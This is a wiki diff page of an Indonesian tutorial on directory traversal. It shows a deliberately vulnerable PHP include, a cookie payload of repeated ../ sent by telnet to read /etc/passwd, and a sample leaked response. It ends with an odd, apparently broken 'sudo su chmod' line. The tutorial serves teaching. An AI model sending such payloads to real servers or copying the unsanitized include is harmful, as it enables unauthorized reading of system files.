Difference between revisions of "Kali Linux: Web Directory Traversal Vulnerability"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 1: | Line 1: | ||
| − | + | Directory traversal (atau path traversal) merupakan eksploitasi kekurangan validasi keamanan / sanitasi nama file input yang disediakan pengguna, seperti karakter yang merepresentasikan "pelintasan / traverse ke direktori induk" dilewatkan ke file API. | |
| − | + | Sasaran serangan ini adalah menggunakan aplikasi yang salah konfigurasi untuk mendapatkan akses tidak sah ke sistem file. Serangan ini mengeksploitasi kurangnya keamanan (walaupun perangkat lunak bertindak persis seperti yang seharusnya) berbeda dengan eksploitasi bug dalam code. | |
| − | + | Direktori traversal juga dikenal sebagai serangan ../ (dot dot slash), directory climbing, dan backtracking. Beberapa bentuk serangan ini juga merupakan canonicalization attack. | |
| − | + | Contoh sederhana aplikasi yang vulnerable di PHP di bawah ini, | |
<?php | <?php | ||
| Line 14: | Line 14: | ||
?> | ?> | ||
| − | + | Aplikasi dapat kita beri nama misalnya vulnerable.php. | |
| + | Diletakan di bawah folder web /var/www/html/vulnerable.php | ||
| + | |||
| + | Serangan terhadap system ini dapat dilakukan menggunakan request HTTP berikut, jika anda kesulitan dapat menggunakan | ||
| + | |||
| + | telnet ip-address-server 80 | ||
| + | |||
| + | masukan / ketik satu per satu kalimat di bawah ini, | ||
| + | |||
GET /vulnerable.php HTTP/1.0 | GET /vulnerable.php HTTP/1.0 | ||
| Line 29: | Line 37: | ||
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh | phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh | ||
| − | + | Karakter ../ yang di ulang-ulang sesudah /home/users/phpguru/templates/ | |
| + | menyebabkan include() untuk melakukan traverse ke root directory, | ||
| + | kemudian include Unix password file /etc/passwd. | ||
Unix /etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords. | Unix /etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords. | ||
Revision as of 05:46, 2 June 2018
Directory traversal (atau path traversal) merupakan eksploitasi kekurangan validasi keamanan / sanitasi nama file input yang disediakan pengguna, seperti karakter yang merepresentasikan "pelintasan / traverse ke direktori induk" dilewatkan ke file API.
Sasaran serangan ini adalah menggunakan aplikasi yang salah konfigurasi untuk mendapatkan akses tidak sah ke sistem file. Serangan ini mengeksploitasi kurangnya keamanan (walaupun perangkat lunak bertindak persis seperti yang seharusnya) berbeda dengan eksploitasi bug dalam code.
Direktori traversal juga dikenal sebagai serangan ../ (dot dot slash), directory climbing, dan backtracking. Beberapa bentuk serangan ini juga merupakan canonicalization attack.
Contoh sederhana aplikasi yang vulnerable di PHP di bawah ini,
<?php
$template = 'red.php';
if (isset($_COOKIE['TEMPLATE']))
$template = $_COOKIE['TEMPLATE'];
include ("/home/users/phpguru/templates/" . $template);
?>
Aplikasi dapat kita beri nama misalnya vulnerable.php. Diletakan di bawah folder web /var/www/html/vulnerable.php
Serangan terhadap system ini dapat dilakukan menggunakan request HTTP berikut, jika anda kesulitan dapat menggunakan
telnet ip-address-server 80
masukan / ketik satu per satu kalimat di bawah ini,
GET /vulnerable.php HTTP/1.0 Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Generating a server response such as:
HTTP/1.0 200 OK Content-Type: text/html Server: Apache root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh daemon:*:1:1::/tmp: phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
Karakter ../ yang di ulang-ulang sesudah /home/users/phpguru/templates/ menyebabkan include() untuk melakukan traverse ke root directory, kemudian include Unix password file /etc/passwd.
Unix /etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords.
However, in more recent Unix systems, the passwd file does not contain the hashed passwords. They are, instead, located in the shadow file which cannot be read by unprivileged users on the machine. It is however, still useful for account enumeration on the machine, as it still displays the user accounts on the system.
Lebih Parah Lagi
sudo su chmod 644 /etc/passwd